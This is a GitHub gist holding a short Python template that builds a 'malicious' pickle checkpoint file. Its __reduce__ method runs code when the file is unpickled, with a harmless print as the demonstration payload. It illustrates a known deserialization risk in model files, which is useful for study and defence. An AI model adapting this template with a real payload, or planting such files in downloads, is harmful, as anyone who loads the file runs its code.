Skip to content

Instantly share code, notes, and snippets.

@CodeZombie

CodeZombie/malicious_pickle_maker.py

Created March 13, 2023 20:42
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save CodeZombie/27baa20710d976f45fb93928cbcfe368 to your computer and use it in GitHub Desktop.
Save CodeZombie/27baa20710d976f45fb93928cbcfe368 to your computer and use it in GitHub Desktop.
Download ZIP
Malicious pickle creation template
Raw
malicious_pickle_maker.py
import pickle
PAYLOAD_MESSAGE = "You just got owned by Arbitrary Code Execution inside a Pickle file."
#A class that when unpickled, will execute the code embedded in the __reduce__ method's return value
class PickleACE(object):
def __reduce__(self):
return (print,(PAYLOAD_MESSAGE,))
# Save the pickle data to a file
with open('malicious_pickle.ckpt', 'wb') as file_handle:
pickle.dump(PickleACE(), file_handle, protocol=pickle.HIGHEST_PROTOCOL)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment